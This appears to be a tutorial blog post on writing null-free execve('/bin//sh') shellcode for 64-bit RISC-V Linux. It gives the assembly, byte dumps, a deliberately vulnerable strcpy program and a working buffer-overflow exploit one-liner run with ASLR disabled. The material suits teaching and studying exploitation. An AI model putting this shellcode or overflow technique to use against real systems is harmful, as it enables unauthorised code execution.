Basic Shellcode in RISC-V Linux

In this post I’m going to summarise some relevant background about the RISC-V architecture and Linux syscalls, then show how shellcode can be written and assembled using the GNU toolchain. As you will see, the output machine code has some null bytes in it so I’ll point out where they’re coming from and iterate through a couple of versions to remove them. I’m just making this up as I go so look out for better techniques.

Real hardware is still difficult and expensive to obtain so I’ve been using a qemu virtual machine running the unfinished Debian RISC-V port. The setup process is moderately involved but fully documented on the Debian wiki. While RISC-V supports a number of configurations it appears that 64-bit little-endian (RV64) will be the standard one for general purpose computing.

For getting started with shellcoding here is the key background information:

In the base standard, instructions are always 32 bits and must be 32-bit-aligned in memory.
Some architectural features are optional extensions. One to be aware of is the Compressed “C” extension, which allows some instructions to shrink to 16 bits, mixed in with 32-bit ones. Instruction alignment is relaxed to 16-bit boundaries.
qemu’s emulated CPU has the C extension and the assembler will produce a mixture of 16- and 32-bit instructions. I suspect that this support will be common in real CPUs for size and performance reasons.
There are 32 integer registers, 64 bits in width, named x0 through x31. They are also given alternative names like ra (return address), sp (stack pointer) and so on, to encourage consistent usage. The program counter pc is separate and cannot be directly referenced.
x0 (also called zero) always contains 0.
System calls are invoked using the ecall instruction, which has no parameters. The syscall number is taken from register a7 and the arguments from a0, a1, a2, etc.
Each individual instruction is stored little-endian in memory. objdump displays them big-endian, which is how they are documented in the ISA manual, so be careful.
There are no stack-manipulating instructions like x86’s call, push and pop. Return addresses are stored in a “link register” of your choice. Pushes and pops are just loads and stores relative to sp (or s0, the frame pointer).
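
The byte-order point in the list above is the one most likely to cause mistakes, so here is a minimal Python 3 sketch of it. The helper name to_memory_bytes is made up for illustration; the only fact it relies on is that ecall is documented as the 32-bit word 0x00000073.

```python
import struct

def to_memory_bytes(word, size=4):
    """Return one instruction's bytes in the order they sit in memory.

    size is 4 for a standard instruction or 2 for a compressed one.
    """
    fmt = "<I" if size == 4 else "<H"   # "<" selects little-endian
    return struct.pack(fmt, word)

# ecall as written in the ISA manual and shown by objdump
ecall_bytes = to_memory_bytes(0x00000073)
print(" ".join(f"{b:02x}" for b in ecall_bytes))   # 73 00 00 00
```

So a word that objdump prints as 00000073 has to be supplied in a buffer as 73 00 00 00.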

If in doubt, refer to the User-Level ISA on the RISC-V website. It’s surprisingly readable and explains some of the design motivations too.

It’s relatively easy to install a riscv64 cross-compiler on Debian but it’s more interesting to run the full VM so I can test my code. I was able to install a native toolchain inside the VM with apt so that’s what I’m using. The list of extensions appears in cpuinfo below (“c” for compressed).

root@riscv64:~# uname -a
Linux riscv64 4.15.0-00048-gfe92d7905c6e-dirty #1 SMP Wed Aug 22 18:43:55 AEST 2018 riscv64 GNU/Linux
root@riscv64:~# cat /proc/cpuinfo
hart	: 0
isa	: rv64imafdcsu
mmu	: sv48

root@riscv64:~# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/riscv64-linux-gnu/8/lto-wrapper
Target: riscv64-linux-gnu
...

Let’s go ahead and assemble some basic shellcode. It should launch /bin/sh using the execve() syscall. According to /usr/include/asm-generic/unistd.h that’s syscall number 221. I’m going to be sloppy and set both the argv and envp arguments (a1 and a2) to null. I just need a pointer to the path in a0. I create execve.s:

    .global _start
    .text
_start:
    li s1, 0x68732f2f6e69622f   # Load "/bin//sh" backwards into s1
    sd s1, -16(sp)              # Store dword s1 on the stack
    sd zero, -8(sp)             # Store dword zero after to terminate
    addi a0,sp,-16              # a0 = filename = sp + (-16)
    slt a1,zero,-1              # a1 = argv set to 0
    slt a2,zero,-1              # a2 = envp set to 0
    li a7, 221                  # execve = 221
    ecall                       # Do syscall
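
As a quick check of the constant in the li line above, the following Python 3 sketch derives it from the path string. The doubled slash presumably pads the path to exactly 8 bytes so that it fills one 64-bit register; that reading is an assumption on my part.

```python
path = b"/bin//sh"            # 8 bytes, so it fits one 64-bit register

# sd stores the register little-endian, so the first character of the
# path must end up in the least significant byte of the register.
value = int.from_bytes(path, "little")
print(hex(value))             # 0x68732f2f6e69622f

# Round trip: what sd s1,-16(sp) would write to memory
stored = value.to_bytes(8, "little")
print(stored)                 # b'/bin//sh'
```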

I’ve already done a couple of basic things to avoid nulls in the output. slt (set if less than) is a tidy way to load zero into a register: 0 is never less than -1, so the result is always 0. (The assembler accepts the immediate operand and emits slti.) (Edit Nov 2018: This isn’t the best choice when compressed instructions are available. You can simply write li a1,0, which saves two bytes. It assembles to the 16-bit C.LI, which can load any 6-bit signed immediate into any register and has no nulls in the machine code.) I also place my data just below sp instead of just above because small positive offsets tend to have lots of zeroes in them.
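
To make the comparison between the two ways of zeroing a1 concrete, here is a rough Python 3 sketch that builds both encodings by hand. The encoder functions are illustrative helpers, not part of any toolchain, and the field layouts are taken from the ISA manual's I-type and C.LI formats.

```python
import struct

def encode_i_type(opcode, funct3, rd, rs1, imm):
    """32-bit I-type: imm[11:0] | rs1 | funct3 | rd | opcode."""
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode

def encode_c_li(rd, imm):
    """16-bit C.LI: 010 | imm[5] | rd | imm[4:0] | 01."""
    imm &= 0x3F
    return (0b010 << 13) | ((imm >> 5) << 12) | (rd << 7) | ((imm & 0x1F) << 2) | 0b01

A1, ZERO = 11, 0                                      # a1 is x11

slti_word = encode_i_type(0x13, 0b010, A1, ZERO, -1)  # slti a1,zero,-1
c_li_word = encode_c_li(A1, 0)                        # c.li a1,0

slti_bytes = struct.pack("<I", slti_word)
c_li_bytes = struct.pack("<H", c_li_word)
print(hex(slti_word), slti_bytes.hex())   # 0xfff02593 9325f0ff
print(hex(c_li_word), c_li_bytes.hex())   # 0x4581 8145
```

Both forms are null-free; the compressed one is simply two bytes shorter.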

Assemble it into an executable:

$ gcc execve.s -c
$ ld execve.o -o execve

As hoped, this runs sh:

tk@riscv64:~$ ./execve
$

Double-checking with strace:

$ strace ./execve
execve("./execve", ["./execve"], 0x3ffffff6d0 /* 16 vars */) = 0
execve("/bin//sh", NULL, NULL)          = 0
...

Now let’s have a look at how this is actually assembled.

$ objdump -d execve
...
0000000000010078 <_start>:
10078:	0343a4b7          	lui	s1,0x343a
1007c:	9794849b          	addiw	s1,s1,-1671
10080:	00c49493          	slli	s1,s1,0xc
10084:	7b748493          	addi	s1,s1,1975
10088:	00c49493          	slli	s1,s1,0xc
1008c:	34b48493          	addi	s1,s1,843
10090:	00d49493          	slli	s1,s1,0xd
10094:	22f48493          	addi	s1,s1,559
10098:	fe913823          	sd	s1,-16(sp)
1009c:	fe013c23          	sd	zero,-8(sp)
100a0:	ff010513          	addi	a0,sp,-16
100a4:	fff02593          	slti	a1,zero,-1
100a8:	fff02613          	slti	a2,zero,-1
100ac:	0dd00893          	li	a7,221
100b0:	00000073          	ecall

That’s way more instructions than we ever typed. The reason is that li is one of several pseudo-instructions. Since it’s impossible to load a 64-bit immediate with a single 32-bit instruction, the assembler automatically expands it into a lui/addiw pair followed by a series of slli (shift left logical immediate) and addi instructions.
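
To see that the expanded sequence really does rebuild the original constant, the instructions can be replayed in a small model. This is a sketch in Python 3 that only models the four instructions used here on a 64-bit register; the function names mirror the mnemonics but are otherwise my own.

```python
MASK64 = (1 << 64) - 1

def sext32(value):
    """Sign-extend the low 32 bits of value."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value

def lui(imm20):
    return sext32(imm20 << 12) & MASK64      # upper 20 bits, sign-extended

def addiw(reg, imm):
    return sext32(reg + imm) & MASK64        # 32-bit add, sign-extended

def addi(reg, imm):
    return (reg + imm) & MASK64

def slli(reg, shamt):
    return (reg << shamt) & MASK64

# Replay of the objdump listing above
s1 = lui(0x343a)
s1 = addiw(s1, -1671)
s1 = slli(s1, 12)
s1 = addi(s1, 1975)
s1 = slli(s1, 12)
s1 = addi(s1, 843)
s1 = slli(s1, 13)
s1 = addi(s1, 559)

print(hex(s1))                    # 0x68732f2f6e69622f
print(s1.to_bytes(8, "little"))   # b'/bin//sh'
```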

We have quite a few null bytes in that auto-generated instruction sequence. In fact, on RV64 an slli encoding starts with six 0 bits followed by a 6-bit shift amount, so any shift of less than 16 leaves the most significant byte zero. How annoying. There is a way out though: remember the compressed instructions? There is a compressed version (C.SLLI in the ISA manual) which isn’t full of zeroes.
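
The difference between the two slli forms can be checked by encoding them by hand. The Python 3 sketch below uses the field layouts from the ISA manual; the helper names are hypothetical and it only covers the shifts used in this shellcode.

```python
import struct

S1 = 9   # s1 is x9

def encode_slli(rd, rs1, shamt):
    """32-bit SLLI: zero upper bits | shamt | rs1 | 001 | rd | 0010011."""
    return ((shamt & 0x3F) << 20) | (rs1 << 15) | (0b001 << 12) | (rd << 7) | 0x13

def encode_c_slli(rd, shamt):
    """16-bit C.SLLI: 000 | shamt[5] | rd | shamt[4:0] | 10."""
    return ((shamt >> 5) << 12) | (rd << 7) | ((shamt & 0x1F) << 2) | 0b10

for shamt in (12, 13):
    full = struct.pack("<I", encode_slli(S1, S1, shamt))
    short = struct.pack("<H", encode_c_slli(S1, shamt))
    print(shamt, full.hex(), 0 in full, short.hex(), 0 in short)
# 12 9394c400 True b204 False
# 13 9394d400 True b604 False
```

The 32-bit words 0x00c49493 and 0x00d49493 match the listing above, and the 16-bit forms come out as 0x04b2 and 0x04b6.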

Let’s replace the li s1, 0x68732f2f6e69622f in our source code with the auto-generated instructions in objdump. New execve.s:

    .global _start
    .text
_start:
    lui	s1,0x343a
    addiw s1,s1,-1671
    slli s1,s1,0xc
    addi s1,s1,1975
    slli s1,s1,0xc
    addi s1,s1,843
    slli s1,s1,0xd
    addi s1,s1,559
    sd s1, -16(sp)              # Store it on the stack
    sd zero, -8(sp)             # Store a zero after to terminate
    addi a0,sp,-16              # a0 = sp + (-16)
    slt a1,zero,-1              # a1 set to 0 because 0 > -1
    slt a2,zero,-1              # Ditto for a2
    li a7, 221                  # execve = 221
    ecall                       # Do syscall

This is the disassembly after reassembling:

$ gcc execve.s -c; ld execve.o -o execve
$ objdump -d execve
...
0000000000010078 <_start>:
10078:	0343a4b7          	lui	s1,0x343a
1007c:	9794849b          	addiw	s1,s1,-1671
10080:	04b2                	slli	s1,s1,0xc
10082:	7b748493          	addi	s1,s1,1975
10086:	04b2                	slli	s1,s1,0xc
10088:	34b48493          	addi	s1,s1,843
1008c:	04b6                	slli	s1,s1,0xd
1008e:	22f48493          	addi	s1,s1,559
10092:	fe913823          	sd	s1,-16(sp)
10096:	fe013c23          	sd	zero,-8(sp)
1009a:	ff010513          	addi	a0,sp,-16
1009e:	fff02593          	slti	a1,zero,-1
100a2:	fff02613          	slti	a2,zero,-1
100a6:	0dd00893          	li	a7,221
100aa:	00000073          	ecall

Now those nulls are gone. What happened? It seems that the li pseudo-instruction will produce 32-bit slli instructions even if the C extension is available. I guess this is a missing optimisation. If we include the slli instructions directly in the source then it correctly optimises them down to the 16-bit format, which is both smaller and has no nulls.

I want to point out the second-last instruction li a7,221. It’s interesting that objdump has displayed this as the pseudo-instruction. In reality this is addi a7,zero,221. Adding a value to the zero register is merely a convenient way to load a small immediate value to a register. For certain immediate values this will create a null byte in the shellcode (it’s okay here with 221 = 0x0dd). One possible solution is to null out a higher register like x31 (whose index is all 1s) and then do addi a7,x31,221.
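
Here is a rough Python 3 sketch of that idea. The immediate 208 (0x0d0) is just an illustrative value whose low nibble is zero, and the helpers are hypothetical; x31 is assumed to have been zeroed beforehand.

```python
import struct

def encode_addi(rd, rs1, imm):
    """32-bit ADDI: imm[11:0] | rs1 | 000 | rd | 0010011."""
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (rd << 7) | 0x13

def has_null(word):
    return 0 in struct.pack("<I", word)

A7, ZERO, X31 = 17, 0, 31

li_221 = encode_addi(A7, ZERO, 221)     # li a7,221 as used above
li_208 = encode_addi(A7, ZERO, 208)     # illustrative problem value
via_x31 = encode_addi(A7, X31, 208)     # addi a7,x31,208 with x31 == 0

print(hex(li_221), has_null(li_221))    # 0xdd00893 False
print(hex(li_208), has_null(li_208))    # 0xd000893 True
print(hex(via_x31), has_null(via_x31))  # 0xd0f8893 False
```

Note that this only fills in the byte shared between the immediate's low nibble and the source register. Immediates from 0 to 15 still leave the top byte zero whichever source register is used.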

Finally we come to ecall. This instruction only exists in a 32-bit form and must appear exactly as 0x00000073. This was easier to deal with in MIPS: the syscall opcode has a numeric parameter so it’s common to see shellcode that fills it with a dummy value like 0x40404. In RISC-V we have no such luck. We have the usual sorts of workarounds: find a vulnerability where nulls are not a badchar, jump to an ecall at a known address, encode the shellcode, or take advantage of the little-endian ordering and try to finish our buffer with 0x73, knowing that there will be three 0x00 chars after it.

For this example let’s assume we have an executable stack. We can generate an ecall at -4(sp) and jump to it. Replace the ecall with the following:

    # the 8 bytes below sp are already 0
    addi a3,zero,0x73       # Assign 0x73 to a3
    sb a3, -4(sp)           # Store single byte at sp-4
    addi a3,sp,-2           # a3 = sp - 2
    jr -2(a3)               # jump to a3 - 2
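
The effect of the stores can be modelled with a byte array standing in for the stack. This is only a sketch in Python 3: the 32-byte region, the 0xAA filler and the sd/sb helpers are made up for illustration.

```python
stack = bytearray(b"\xAA" * 32)   # hypothetical stack region, junk-filled
sp = 32                           # index playing the role of sp

def sd(value, offset):
    """Store a 64-bit value little-endian at sp+offset."""
    stack[sp + offset:sp + offset + 8] = value.to_bytes(8, "little")

def sb(value, offset):
    """Store a single byte at sp+offset."""
    stack[sp + offset] = value & 0xFF

sd(0x68732f2f6e69622f, -16)   # sd s1,-16(sp)
sd(0, -8)                     # sd zero,-8(sp)
sb(0x73, -4)                  # sb a3,-4(sp)

path = bytes(stack[sp - 16:sp - 8])
word = int.from_bytes(stack[sp - 4:sp], "little")
print(path)                   # b'/bin//sh'
print(f"{word:08x}")          # 00000073
```

The four bytes at -4(sp) now read as ecall, and the four zero bytes at -8(sp) still terminate the path string.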

To avoid nulls, the jr needs to have a small negative offset and I also need to use a different base register than sp: with the zero register as the link destination, the second byte of the encoding is zero unless the base register has an odd number, and sp is x2. Here I’ve chosen to use a3 (x13). I need to get the stack pointer value into a3, but again I need to use a small negative offset in the addi to avoid nulls. I “share” the required offset of -4 across the two instructions so they both get a small negative.
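
The register and offset choices can be checked by encoding a few candidate jumps. This Python 3 sketch covers only the 32-bit jalr form (jr is a pseudo-instruction for jalr with the zero register as destination); an assembler with the C extension may pick a 16-bit encoding for a zero-offset jr, which is not modelled here. The helper names are my own.

```python
import struct

def encode_jalr(rd, rs1, imm):
    """32-bit JALR: imm[11:0] | rs1 | 000 | rd | 1100111."""
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (rd << 7) | 0x67

def mem_bytes(word):
    return struct.pack("<I", word)

ZERO, SP, A3 = 0, 2, 13

candidates = {
    "jr -4(sp)": encode_jalr(ZERO, SP, -4),
    "jr 0(a3)":  encode_jalr(ZERO, A3, 0),
    "jr -2(a3)": encode_jalr(ZERO, A3, -2),
}
for text, word in candidates.items():
    b = mem_bytes(word)
    print(f"{text:10} {word:08x} {b.hex()} null={0 in b}")
# jr -4(sp)  ffc10067 6700c1ff null=True
# jr 0(a3)   00068067 67800600 null=True
# jr -2(a3)  ffe68067 6780e6ff null=False
```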

This time it must be linked with an executable stack. Otherwise the program will segfault on the jump.

$ gcc execve.s -c; ld execve.o -o execve -z execstack

The final disassembly with no nulls:

00000000000100b0 <_start>:
100b0:	0343a4b7          	lui	s1,0x343a
100b4:	9794849b          	addiw	s1,s1,-1671
100b8:	04b2                	slli	s1,s1,0xc
100ba:	7b748493          	addi	s1,s1,1975
100be:	04b2                	slli	s1,s1,0xc
100c0:	34b48493          	addi	s1,s1,843
100c4:	04b6                	slli	s1,s1,0xd
100c6:	22f48493          	addi	s1,s1,559
100ca:	fe913823          	sd	s1,-16(sp)
100ce:	fe013c23          	sd	zero,-8(sp)
100d2:	ff010513          	addi	a0,sp,-16
100d6:	fff02593          	slti	a1,zero,-1
100da:	fff02613          	slti	a2,zero,-1
100de:	0dd00893          	li	a7,221
100e2:	07300693          	li	a3,115
100e6:	fed10e23          	sb	a3,-4(sp)
100ea:	ffe10693          	addi	a3,sp,-2
100ee:	ffe68067          	jr	-2(a3)

Let’s see the bytes in the order we actually need to provide them in our buffer.

$ objcopy -O binary --only-section=.text execve execve.text
$ od -t x1 execve.text
0000000 b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
0000020 93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
0000040 01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
0000060 d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
0000100 e6 ff
0000102
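
As a sanity check, the dump can be scanned for nulls and split back into instructions. The Python 3 sketch below assumes only 16-bit and 32-bit encodings are present (an instruction is 32 bits wide when its two lowest bits are 11); the function name is hypothetical.

```python
dump = """
b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
e6 ff
"""
code = bytes.fromhex("".join(dump.split()))

def split_instructions(data):
    """Split raw code into instruction words, as objdump would print them."""
    words = []
    i = 0
    while i < len(data):
        size = 4 if data[i] & 0b11 == 0b11 else 2
        words.append((size, int.from_bytes(data[i:i + size], "little")))
        i += size
    return words

words = split_instructions(code)
print(len(code), "bytes,", len(words), "instructions, nulls:", 0 in code)
# 66 bytes, 18 instructions, nulls: False
for size, word in words[:3]:
    print(f"{word:0{size * 2}x}")
# 0343a4b7
# 9794849b
# 04b2
```

The recovered words match the objdump listing, with the bytes of each one reversed relative to the dump.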

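Notice that the bytes within each instruction are in reverse order compared with the objdump listing; the instructions themselves are still in the same sequence. To try it out, let’s set up an embarrassingly vulnerable test environment with a buffer overflow. First disable ASLR so our stack is predictable: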

# echo 0 > /proc/sys/kernel/randomize_va_space

Now create a program vuln.c:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]);

void do_vuln(char *text) {
    char buffer[128];
    strcpy(buffer, text);
    printf("Location of buffer: %p\n", (void *)buffer);
    printf("Location of main: %p\n", (void *)main);
    printf("Input len: %zu\n", strlen(buffer));
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Please include an argument\n");
    } else {
        do_vuln(argv[1]);
    }
    return 0;
}

We will need to compile this with an executable stack also.

$ gcc vuln.c -z execstack -o vuln
$ ./vuln hello
Location of buffer: 0x3ffffff4c0
Location of main: 0x2aaaaaa76a
Input len: 5

I won’t go into detail here but if you look at objdump -d vuln you can work out that inside do_vuln() the return address is stored at 152(sp) and the buffer is at 16(sp).

[shellcode][AAAAA...padding to total len 136 bytes][ret address overwrite]
^ buffer

In practice the location of buffer depends on the size of the arguments on the stack (it moved from 0x3ffffff4c0 to 0x3ffffff440 once the argument grew to 141 bytes), so it takes a bit of trial and error, but it does work:

tk@riscv64:~$ ./vuln `python -c 'b = "\xb7\xa4\x43\x03\x9b\x84\x94\x97\xb2\x04\x93\x84\x74\x7b\xb2\x04\x93\x84\xb4\x34\xb6\x04\x93\x84\xf4\x22\x23\x38\x91\xfe\x23\x3c\x01\xfe\x13\x05\x01\xff\x93\x25\xf0\xff\x13\x26\xf0\xff\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xfe\x93\x06\xe1\xff\x67\x80\xe6\xff"; b += "A"*(136-len(b)); b += "\x40\xf4\xff\xff\x3f"; print b'`
Location of buffer: 0x3ffffff440
Location of main: 0x2aaaaaa76a
Input len: 141
$
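
The one-liner above is Python 2. A Python 3 sketch of the same payload construction might look like the following. The names build_payload and write_payload are hypothetical, and BUFFER_ADDR is simply the value printed in the run above, so it will differ in other environments.

```python
import struct

SHELLCODE = bytes.fromhex(
    "b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04 "
    "93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c "
    "01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08 "
    "d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80 "
    "e6 ff"
)
RET_OFFSET = 152 - 16          # return address slot minus buffer start
BUFFER_ADDR = 0x3ffffff440     # assumption: taken from the run above

def build_payload(shellcode, buffer_addr, ret_offset=RET_OFFSET):
    """Shellcode, padding up to the saved return address, then the address."""
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"A" * (ret_offset - len(shellcode))
    # Drop the zero high bytes; strcpy would stop at them anyway.
    addr = struct.pack("<Q", buffer_addr).rstrip(b"\x00")
    payload = shellcode + padding + addr
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte")
    return payload

def write_payload(stream, payload):
    """Write the raw bytes to a binary stream such as sys.stdout.buffer."""
    stream.write(payload)

payload = build_payload(SHELLCODE, BUFFER_ADDR)
print(len(payload))            # 141
```

Dropping the high bytes of the address relies on the upper bytes of the saved return address already being zero, with strcpy's terminator supplying the first of them. The length of 141 agrees with the "Input len" line in the run above.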

Final execve.s:

    .global _start
    .text
_start:
    lui	s1,0x343a               # Load "/bin//sh" into s1
    addiw s1,s1,-1671
    slli s1,s1,0xc
    addi s1,s1,1975
    slli s1,s1,0xc
    addi s1,s1,843
    slli s1,s1,0xd
    addi s1,s1,559
    sd s1, -16(sp)              # Store it on the stack
    sd zero, -8(sp)             # Store a zero after to terminate
    addi a0,sp,-16              # a0 = sp + (-16)
    slt a1,zero,-1              # a1 set to 0 because 0 > -1
    slt a2,zero,-1              # Ditto for a2
    li a7, 221                  # execve = 221
    addi a3,zero,0x73           # Create ecall instruction at -4(sp)
    sb a3, -4(sp)
    addi a3,sp,-2               # Dodge nulls in instructions
    jr -2(a3)                   # Jump to -4(sp)